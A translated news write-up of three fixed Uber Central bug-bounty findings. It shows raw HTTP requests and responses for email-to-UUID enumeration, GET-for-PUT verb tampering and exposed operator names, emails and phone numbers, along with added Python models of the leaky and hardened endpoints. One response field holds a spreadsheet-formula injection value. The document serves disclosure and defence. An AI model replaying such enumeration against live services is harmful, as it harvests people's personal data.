
Uber fixes three vulnerabilities, white hat earns several thousand dollars (with vulnerability analysis)

Security incidents | aqzt | 2016-12-19 | 225 views | 0 comments

Security researcher Kevin Roh found three vulnerabilities in Uber Central, Uber's online app for businesses, that could leak user data. Uber fixed all three promptly and paid Roh several thousand dollars under its bug bounty program.

Uber Central

Uber Central launched in July 2016. The online app lets a business arrange rides for several customers at once and oversee everything from booking through management to payment.

With Uber Central, a single account can manage multiple trips at the same time and choose among Uber's vehicle classes (UberX, UberBlack and so on). Besides the app, Uber Central ships a browser version through which a business can request several Uber cars at once; it also sends trip details by SMS so that customers without a smartphone are covered.


The three vulnerabilities

0x01 Enumerating userUUIDs by email address

A Uber Central administrator can promote an already-registered Uber user to an operator (typically a company employee) only by supplying that user's registration email address. Roh therefore built a simple request:

POST /admin/api/organizations/[organizationUUID]/operators HTTP/1.1
Host: central.uber.com
Connection: close
Content-Length: 40
Accept: application/json
Origin: https://central.uber.com
x-csrf-token: XXXX
x-uber-origin: web-central-admin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/json
Referer: https://central.uber.com/admin/locations
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: _ua=XXXX

{"operatorEmail":"r****@unlv.nevada.edu"}

If the email address is already in use by an Uber account, the response reveals that user's UUID.

Server response:

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Sep 2016 01:12:15 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
x-csrf-token: XXXX
Set-Cookie: web-central-admin:sess=fNlg1atG-0-XXXX path=/; expires=Tue, 06 Sep 2016 00:40:29 GMT; httponly
X-Uber-App: web-central-admin
Strict-Transport-Security: max-age=0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=2592000
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0
Content-Length: 348

{"data":{"operatorEmail":"r****@unlv.nevada.edu","organizationUuid":"[organizationUUID]","userUuid":"72225a84-53c4-4766-9ca1-6eec06cbaa13"},"createOperator":{"uuid":"9987c0ca-0894-4992-810b-0da64b6a53fc","userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","firstName":null,"lastName":null,"email":null,"phoneNumber":null,"branches":null}}

The user registered as r****@unlv.nevada.edu therefore has userUUID 906d29c8-7b17-4e90-900e-1af72e1c72a6 (the createOperator.userUUID field; the data.userUuid value 72225a84-... is the requesting admin's own account, as the later responses confirm). Note that the lookup succeeds for any registered Uber account, not just members of the organization.

An attacker could write a simple script that submits candidate values for the operatorEmail parameter, enumerating which addresses belong to registered Uber users together with their UUIDs.
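The following added example (not from the article or from Uber) models the oracle in working Python: a handler that behaves like the original response, a hardened one whose response is identical whether or not the address is registered, and the enumeration loop that tells the two apart. The account store, organization id, status codes and handler names are assumptions.

```python
"""Email-to-userUUID oracle: a leaky operator-creation handler beside a
hardened one, plus the enumeration loop that exploits the difference.

Added example for this article, not Uber's code. The account directory,
the endpoint names and the response shapes are assumptions modelled on
the request/response shown above.
"""
import uuid

# Constructed account store standing in for Uber's user directory.
REGISTERED_USERS = {
    "alice@example.com": str(uuid.uuid5(uuid.NAMESPACE_DNS, "alice")),
    "bob@example.com": str(uuid.uuid5(uuid.NAMESPACE_DNS, "bob")),
}
ORG_UUID = "11111111-1111-4111-8111-111111111111"  # constructed organizationUUID
PENDING_INVITES = {}


def create_operator_vulnerable(org_uuid, operator_email):
    """Modelled on the original behaviour: a registered address resolves to
    the account's global userUUID and is echoed back; an unknown address
    errors. Status code, body shape and the userUUID field all differ, so
    the endpoint doubles as a 'does this email have an Uber account?' oracle."""
    user_uuid = REGISTERED_USERS.get(operator_email)
    if user_uuid is None:
        return 404, {"error": "user not found"}
    return 200, {
        "createOperator": {
            "uuid": str(uuid.uuid4()),
            "userUUID": user_uuid,
            "email": None,
        }
    }


def create_operator_hardened(org_uuid, operator_email):
    """Same admin workflow, no oracle: the response has the same status and
    keys whether or not the address is registered, never carries the global
    userUUID, and the operator id is scoped to this organization. Linking
    to a real account happens when the invitee accepts, not here."""
    # Deterministic per (org, email) so re-sending an invite does not leak
    # 'already invited' through a changing id either.
    operator_uuid = str(uuid.uuid5(uuid.NAMESPACE_URL, f"{org_uuid}/{operator_email}"))
    PENDING_INVITES[(org_uuid, operator_email)] = operator_uuid
    return 202, {"createOperator": {"uuid": operator_uuid, "linkStatus": "PENDING"}}


def enumerate_emails(endpoint, candidates):
    """What the 'simple script' in the text does: submit each candidate as
    operatorEmail and keep every address the endpoint confirms, with the
    userUUID it hands back."""
    found = {}
    for email in candidates:
        status, body = endpoint(ORG_UUID, email)
        user_uuid = body.get("createOperator", {}).get("userUUID")
        if status == 200 and user_uuid:
            found[email] = user_uuid
    return found


def response_signature(endpoint, email):
    """Everything an attacker can compare between two responses: status,
    top-level keys, inner keys, and whether a userUUID is present."""
    status, body = endpoint(ORG_UUID, email)
    inner = body.get("createOperator", {})
    return status, tuple(sorted(body)), tuple(sorted(inner)), "userUUID" in inner


def is_oracle(endpoint):
    """True if a registered and an unregistered address are distinguishable."""
    return (response_signature(endpoint, "alice@example.com")
            != response_signature(endpoint, "nobody@example.com"))


if __name__ == "__main__":
    wordlist = ["alice@example.com", "nobody@example.com", "bob@example.com"]
    print("vulnerable:", enumerate_emails(create_operator_vulnerable, wordlist))
    print("hardened:  ", enumerate_emails(create_operator_hardened, wordlist))
```

Equalising the response shape closes the direct oracle but not side channels such as response timing, so the invite endpoint also needs per-session rate limiting, and a burst of distinct operatorEmail values from one admin session is worth alerting on.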

0x02 Enumerating userUUIDs with a GET request

The second vulnerability has the same effect as the first; the only difference is that the POST is replaced with a GET (the JSON body is still sent). The response lists every operator in the organization, including pending invitees, with their email addresses and userUUIDs.

GET request:

GET /admin/api/organizations/[organizationUUID]/operators HTTP/1.1
Host: central.uber.com
Connection: close
Content-Length: 34
Origin: https://central.uber.com
x-csrf-token: XXXX
x-uber-origin: web-central-admin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36
Content-Type: application/json
Accept: application/json
Referer: https://central.uber.com/admin/locations
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: _ua=XXXX

{"operatorEmail":"test2@test.com"}

Server response:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Oct 2016 22:44:58 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: web-central-admin:sess=XXXX
X-Uber-App: web-central-admin
Strict-Transport-Security: max-age=0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=2592000
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0
Content-Length: 2801

{"data":{"organizationUuid":"[organizationUUID]","userUuid":"72225a84-53c4-4766-9ca1-6eec06cbaa13"},"operatorsForOrg":{"organization":{"uuid":"[organizationUUID]","name":"rohk","u4bUUID":null,"businessType":"Hospitality","estimatedDailyTrips":"500+","estimatedBranchCount":"1-5","state":"APPROVED"},"operators":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"uuid":"688f8c6e-e323-4750-97b4-86656a8a2644","userUUID":"72225a84-53c4-4766-9ca1-6eec06cbaa13","firstName":"KEVIN","lastName":"ROH","email":"rohkroh@gmail.com","phoneNumber":"XXXX"},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"uuid":"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405","userUUID":"59a95100-5be4-4df8-a6e8-a180ec29036e","firstName":null,"lastName":null,"email":"p***@unlv.nevada.edu","phoneNumber":null},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"uuid":"276c9b65-7d85-4500-bc62-daf9a3d211e4","userUUID":"de483ca6-43bf-4930-bfe3-e3312d1fe478","firstName":null,"lastName":null,"email":"ch*****@gmail.com","phoneNumber":null},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"uuid":"c449f804-b905-4cfb-aa73-9c1e36e1512a","userUUID":"8de8282e-0d11-4d9d-938b-fbd19b826703","firstName":null,"lastName":null,"email":"test@test.com","phoneNumber":null},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"uuid":"f198e728-f4a2-487a-a6ee-3c9e4e4621b2","userUUID":"e71f3f9f-784c-4cba-9d76-d4f110e090e2","firstName":null,"lastName":null,"email":"test2@test.com","phoneNumber":null},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"uuid":"fba45580-c36e-460b-a55d-198f8bd82d6e","userUUID":"d9f142b2-1f91-49ae-a7a7-feadcdfa1375","firstName":null,"lastName":null,"email":"em***@outlook.com","phoneNumber":null},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"uuid":"3a3b2393-7f89-45b7-a558-98b8f117fe46","userUUID":"5e699c04-d453-4dab-9e32-90c6a610c4c3","firstName":null,"lastName":null,"email":"kr****@live.com","phoneNumber":null},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"uuid":"9987c0ca-0894-4992-810b-0da64b6a53fc","userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","firstName":"test","lastName":"account","email":"r****@unlv.nevada.edu","phoneNumber":"XXXX"}},"operatorsLinkStatusAndRoles":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"linkStatus":"LINKED","roles":["ADMIN","USER"]},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"linkStatus":"PENDING","roles":["USER"]},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"linkStatus":"PENDING","roles":["USER"]},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"linkStatus":"PENDING","roles":["USER"]},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"linkStatus":"PENDING","roles":["USER"]},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"linkStatus":"PENDING","roles":["USER"]},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"linkStatus":"PENDING","roles":["USER"]},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"linkStatus":"LINKED","roles":["USER"]}}}}

Uber fixed this: an email address is no longer tied to the user's userUUID in the response. Every GET still returns a random userUUID, though (smirk).

0x03 Pulling more information

With a large set of valid email addresses and their userUUIDs in hand, GET requests can be used to retrieve more data. Once a user has been promoted to operator, i.e. the business users registered with Uber Central, their details are exposed: first and last name, phone number, email address and userUUID.

The original request to this path is a PUT (it assigns operators to a branch). Changing the verb to GET while keeping the body returns far more information.

GET request:

GET /admin/api/organizations/[organizationUUID]/branches/8c744451-3e3e-43c3-aaaf-2bf52feab19c/operators HTTP/1.1
Host: central.uber.com
Connection: close
Content-Length: 331
Accept: application/json
Origin: https://central.uber.com
x-csrf-token: XXXX
x-uber-origin: web-central-admin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36
Content-Type: application/json
Referer: https://central.uber.com/admin/locations
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8
Cookie: _ua=XXXX

{"operatorUuids":["9987c0ca-0894-4992-810b-0da64b6a53fc","688f8c6e-e323-4750-97b4-86656a8a2644","e13a4bd3-21e4-4dae-b1cc-84b4e6de7405","c449f804-b905-4cfb-aa73-9c1e36e1512a","fba45580-c36e-460b-a55d-198f8bd82d6e","3a3b2393-7f89-45b7-a558-98b8f117fe46","276c9b65-7d85-4500-bc62-daf9a3d211e4","f198e728-f4a2-487a-a6ee-3c9e4e4621b2"]}

Server response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 21 Oct 2016 00:43:48 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: web-central-admin:XXXX
X-Uber-App: web-central-admin
Strict-Transport-Security: max-age=0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=2592000
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0
Content-Length: 2851

{"data":{"branchUuid":"8c744451-3e3e-43c3-aaaf-2bf52feab19c","userUuid":"72225a84-53c4-4766-9ca1-6eec06cbaa13"},"operatorsForOrg":{"branch":{"uuid":"8c744451-3e3e-43c3-aaaf-2bf52feab19c","name":"","phoneNumber":"+XXXX","address":"XXXX","email":""},"operators":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"uuid":"688f8c6e-e323-4750-97b4-86656a8a2644","userUUID":"72225a84-53c4-4766-9ca1-6eec06cbaa13","firstName":"KEVIN","lastName":"ROH","email":"rohkroh@gmail.com","phoneNumber":"XXXX"},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"uuid":"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405","userUUID":"59a95100-5be4-4df8-a6e8-a180ec29036e","firstName":"Ted","lastName":"Pele","email":"p***@unlv.nevada.edu","phoneNumber":null},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"uuid":"9987c0ca-0894-4992-810b-0da64b6a53fc","userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","firstName":"test","lastName":"account","email":"r****@unlv.nevada.edu","phoneNumber":"XXXX"},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"uuid":"c449f804-b905-4cfb-aa73-9c1e36e1512a","userUUID":"8de8282e-0d11-4d9d-938b-fbd19b826703","firstName":"AndrewTEST","lastName":"Test","email":"test@test.com","phoneNumber":"XXXX"},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"uuid":"f198e728-f4a2-487a-a6ee-3c9e4e4621b2","userUUID":"e71f3f9f-784c-4cba-9d76-d4f110e090e2","firstName":"uber","lastName":"uber","email":"test2@test.com","phoneNumber":"XXXX"},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"uuid":"fba45580-c36e-460b-a55d-198f8bd82d6e","userUUID":"d9f142b2-1f91-49ae-a7a7-feadcdfa1375","firstName":"h1","lastName":"emckai","email":"em****@outlook.com","phoneNumber":null},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"uuid":"3a3b2393-7f89-45b7-a558-98b8f117fe46","userUUID":"5e699c04-d453-4dab-9e32-90c6a610c4c3","firstName":"=HYPERLINK(/"http://google.com/")","lastName":"","email":"kr******@live.com","phoneNumber":null},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"uuid":"276c9b65-7d85-4500-bc62-daf9a3d211e4","userUUID":"de483ca6-43bf-4930-bfe3-e3312d1fe478","firstName":"XXXXX","lastName":"XXXXX","email":"ch******@gmail.com","phoneNumber":"XXXX"}},"operatorsLinkStatusAndRoles":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"linkStatus":"LINKED","roles":["ADMIN","USER"]},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"linkStatus":"PENDING","roles":["USER"]},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"linkStatus":"LINKED","roles":["USER"]},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"linkStatus":"PENDING","roles":["USER"]},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"linkStatus":"PENDING","roles":["USER"]},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"linkStatus":"PENDING","roles":["USER"]},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"linkStatus":"PENDING","roles":["USER"]},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"linkStatus":"PENDING","roles":["USER"]}}}}

The response above shows several users' first names, last names, phone numbers, email addresses and userUUIDs, including pending invitees who never accepted the invitation.

Uber fixed this: firstName, lastName and phoneNumber now come back as null. Every GET still returns a random userUUID, though (smirk again).
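The second and third bugs share one root cause: a route written for one verb (PUT, to assign operators to a branch) answered GET as well, and the handler serialised every stored field of every record it touched. The following added example (not the article's or Uber's code) shows, in Python, a dispatcher modelled on that behaviour beside a hardened one that routes on (method, path), rejects other verbs before touching data, checks the ADMIN role, and passes records through a field allowlist. The path pattern mirrors the branch route shown above; the role model, the records and the field lists are assumptions.

```python
"""Verb tampering on a PUT-only route, and over-exposed operator records:
a leaky dispatcher beside a hardened one.

Added example for this article, not Uber's code. The path pattern mirrors
the branch operators route shown above; the role model, the data and the
field allowlists are assumptions.
"""
import re
from dataclasses import dataclass

BRANCH_OPERATORS_RE = re.compile(
    r"^/admin/api/organizations/(?P<org>[^/]+)/branches/(?P<branch>[^/]+)/operators$"
)

# Everything the backing record holds versus what an org admin needs to
# manage branch assignments. PII_FIELDS is what the third bug exposed.
FULL_FIELDS = ("uuid", "userUUID", "firstName", "lastName", "email", "phoneNumber")
SAFE_FIELDS = ("uuid", "email")
PII_FIELDS = {"userUUID", "firstName", "lastName", "phoneNumber"}


@dataclass
class Operator:
    uuid: str
    user_uuid: str
    first_name: str
    last_name: str
    email: str
    phone: str

    def as_json(self, fields):
        """Serialise only the named fields; the allowlist is the control."""
        record = {
            "uuid": self.uuid, "userUUID": self.user_uuid,
            "firstName": self.first_name, "lastName": self.last_name,
            "email": self.email, "phoneNumber": self.phone,
        }
        return {k: record[k] for k in fields}


# Constructed operator records for one organization.
OPERATORS = {
    "op-1": Operator("op-1", "user-aaa", "Ada", "Admin", "ada@example.com", "+15550000001"),
    "op-2": Operator("op-2", "user-bbb", "Pat", "Pending", "pat@example.com", "+15550000002"),
}


def handle_leaky(method, path, body=None, roles=("USER",)):
    """Modelled on the original: the route is matched on path alone, so the
    handler written for PUT answers GET too, and it returns every stored
    field of every operator it touches."""
    if not BRANCH_OPERATORS_RE.match(path):
        return 404, {}
    return 200, {"operators": {u: op.as_json(FULL_FIELDS) for u, op in OPERATORS.items()}}


def handle_hardened(method, path, body=None, roles=("USER",)):
    """Dispatch on (method, path): unlisted verbs get 405 before any
    authorization or data access; the ADMIN role is required; only the
    org-scoped operators the caller assigned are echoed, via SAFE_FIELDS."""
    m = BRANCH_OPERATORS_RE.match(path)
    if not m:
        return 404, {}
    if method != "PUT":
        return 405, {"allow": ["PUT"]}
    if "ADMIN" not in roles:
        return 403, {"error": "admin role required"}
    requested = (body or {}).get("operatorUuids", [])
    assigned = [u for u in requested if u in OPERATORS]
    return 200, {
        "branchUuid": m.group("branch"),
        "operators": {u: OPERATORS[u].as_json(SAFE_FIELDS) for u in assigned},
    }


def exposed_pii(response_body):
    """PII field names present in a response: what a response-schema audit
    or a gateway DLP rule would flag."""
    found = set()
    for record in response_body.get("operators", {}).values():
        found |= PII_FIELDS & set(record)
    return found


if __name__ == "__main__":
    path = "/admin/api/organizations/org-1/branches/branch-1/operators"
    body = {"operatorUuids": ["op-1", "op-2", "op-does-not-exist"]}
    status, resp = handle_leaky("GET", path)
    print("leaky GET   :", status, sorted(exposed_pii(resp)))
    print("hardened GET:", handle_hardened("GET", path)[0])
    status, resp = handle_hardened("PUT", path, body, roles=("ADMIN", "USER"))
    print("hardened PUT:", status, sorted(exposed_pii(resp)), sorted(resp["operators"]))
```

The order of checks matters: the verb check comes first so that a wrong method never reaches the data layer, and the field allowlist is applied at serialisation rather than by deleting keys afterwards, so a new column added to the record later is not exposed by default.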

Roh describes the testing he did on these vulnerabilities on his blog.

* Source: affairs; translated by FreeBuf editor bimeover. When reposting, please credit FreeBuf.COM.

